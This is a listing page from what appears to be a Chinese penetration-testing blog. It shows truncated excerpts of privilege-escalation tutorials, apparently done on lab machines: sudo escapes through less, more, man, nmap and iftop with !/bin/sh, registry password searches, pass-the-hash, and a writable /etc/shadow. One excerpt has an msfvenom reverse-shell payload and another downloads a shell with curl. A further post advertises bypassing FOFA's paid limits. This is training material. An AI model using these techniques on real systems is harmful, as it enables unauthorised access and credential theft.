-
隐藏付费阅读
隐藏付费阅读秘密揭晓:FOFA个人永久专业版如何突破付费版本限制?
fofa最近取消了个人永久专业版,并且需要按月进行收费了,看着这个会员费用,我也是泪目了,xdm。 那如何突破付费限制呢? 以下是没突破前的截图 当然这只是其中一种, 还有就是被限制了10000页如何突破? 以下是突破后的截图 实战突破fofa付费版本限制...- 0
- 0
- 20.7k
-
sudo提权 - apache2
在没有 shell 转义序列的情况下,可以使用sudo来操作apache2进行提权: sudo apache2 -f /etc/shadow john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt...- 0
- 0
- 28
-
Rogue Potato - 土豆提权
4:35当前帖子内容 Rogue Potato是使用欺骗攻击的攻击名称 同时进行NTLM中继攻击以获得系统权限 该攻击诱使Windows作为系统进行身份验证 用户使用NTLM访问一个假的HTTP服务器;NTLM凭据 然后NTLM凭据将其转告到SMB以获得命令执行 提权条件 1.本地NTLM中继获取SYSTEM令牌 2.SeImpersonatePrivilege特权 测试中任意用户都可以通过本地N…...- 0
- 0
- 13
-
可利用的 GUI 应用程序提权
在某些(较旧)版本的 Windows 中,用户可以获得使用管理员权限运行某些 GUI 应用的权限。 通常有许多方法可以生成来自GUI应用内的命令提示,包括使用原生 Windows 功能。 Since 父过程运行时具有管理员权限,生成的命令提示也将运行这些权限 实操 由于本文中的演示需要GUI,假设在初始枚举期间我们就找到了用户 user 登录的凭据并且使用RDP/3389 上打开。 启动 RDP会…...- 0
- 0
- 8
-
sudo提权 - less
less工具是对文件或者其他输出进行分页显示的工具 sudo less /etc/profile 回车一下就会看到底部有个: 输入 !/bin/sh ...- 0
- 0
- 6
-
利用AlwaysInstallElevated提权
AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system权限安装MSI文件 实操 攻击机生成shell开启http访问,利用curl在目标机下载 攻击机开启监听并完成反弹 关于alwaysinstallelevated在注册表的位置如下只有值为1才代表具有系统权限: reg query HKCU\\SOFTWARE\\Policies\\Microso…...- 0
- 0
- 6
-
sudo提权 - nmap
nmap是网络扫描和嗅探工具包 #nmap的sudo提权命令(禁用输入回显) TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF #nmap的sudo提权命令(利用nmap版本2.02至5.21的交互模式) sudo nmap --interactive nmap…...- 0
- 0
- 5
-
sudo提权 - more
more,是linux的一个命令,类似cat命令,会以一页一页的显示,方便使用者逐页阅读。 直接按shift+1,感叹号!进行输入命令 !/bin/sh 回车后 ...- 0
- 0
- 5
-
搜索注册表处的密码提权
(由于某些原因,有时密码会被存储在注册表中。) 可以在注册表中搜索包含 "password "的键和值。 reg query HKLM /f password /t REG_SZ /s #本地机器注册表项 reg query HKCU /f password /t REG_SZ /s #当前用户注册表项 我们可以手动验证这些:(查询注册表) reg query "HK…...- 0
- 0
- 5
-
mysql UDF提权
拿到普通user权限,sudo一下,再看下进程 user@debian:~$ ps -aux | grep sql Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html root 1906 0.0 0.1 9180 1396 ? S 00:56 0:00 /bin/sh /u…...- 0
- 0
- 3
-
sudo提权 - iftop
iftop 是一个用于实时监视网络流量的工具。 shift+1也就是!感叹号可以执行命令。 命令输入: sudo iftop 然后可以看到一个流量监控的界面 然后按下 Shift+1 感叹号! 可以调出命令行 接下来输入 ! /bin/sh 直接提权 ...- 0
- 0
- 3
-
弱服务权限daclsvc提权
弱服务权限daclsvc提权 模拟获取到内网机器 xfreerdp连接上去 xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130 connect…...- 0
- 0
- 3
-
sudo提权 - man
man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息。 sudo man man !/bin/sh ...- 0
- 0
- 3
-
Scheduled Tasks - 计划任务提权
任务通常使用创建它们的用户的权限运行,但管理员可以配置以其他用户(包括系统)身份运行,那我们就可以利用这点进行提权 什么是Scheduled Tasks Scheduled Tasks是任务计划程序,Scheduled Tasks可以在计算机上自动执行你创建的任务。 原理: Task Scheduler通过监视你选择的条件(称为触发器),然后在满足这些条件时执行任务(例如 每 5 分钟)或由某个事…...- 0
- 0
- 2
-
弱文件权限 - 可写 /etc/shadow 提权
/etc/shadow 文件包含用户密码哈希值,通常只有 root 用户才能读取该文件。 请注意,虚拟机上的 /etc/shadow 文件是可写的: ls -l /etc/shadow 运行结果: user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$ …...- 0
- 0
- 2
-
哈希传递 - PassThe Hash
既然可以使用哈希进行身份验证,为什么还要破解密码哈希? winexe winexe在kali里面自带,用于在linux平台连接windows机器 环境要求:开启文件共享,即smb服务;禁用UAC远程限制 将完整的管理员哈希与 pth-winexe 一起使用,以生成一个以管理员身份运行的 shell,而无需破解其密码。 请记住,完整哈希包括 LM 和 NTLM 哈希,以冒号分隔: pth-winex…...- 0
- 0
- 2
-
sudo提权 - find
find 命令用于在指定目录下查找文件和目录。 提权利用 收集具有SUID权限的文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; /表示从文件系统的顶部(根)开…...- 0
- 0
- 2
-
利用可执行服务文件提权
利用可执行服务文件提权 我们的服务启动的时候是伴随着一个exe文件启动的,而我们如果对这个exe文件和目录有可写权限就可以用恶意文件去覆盖掉正常的文件进行提权 msf生成shell root@ip-10-10-4-200:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.4.200 LPORT=6666 -f exe …...- 0
- 0
- 2
-
利用存储的凭证提升权限
通过存储凭证提升权限 RunAs 通过存储凭证提升权限 在目标主机传shell弹回来后,我们应该立即开始执行手动枚举,以便在我们开始使用工具之前更好地了解我们正在使用的是什么。 这挺重要,因为搜索存储的凭据应该是获得据点前首先执行的手动命令之一。 手动枚举存储的凭据 查找存储的凭据可以使用一个简单的命令来完成: cmdkey /list 这里我们可以看到本地Admin账户的凭证已经存储,可以用来执…...- 0
- 0
- 2
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×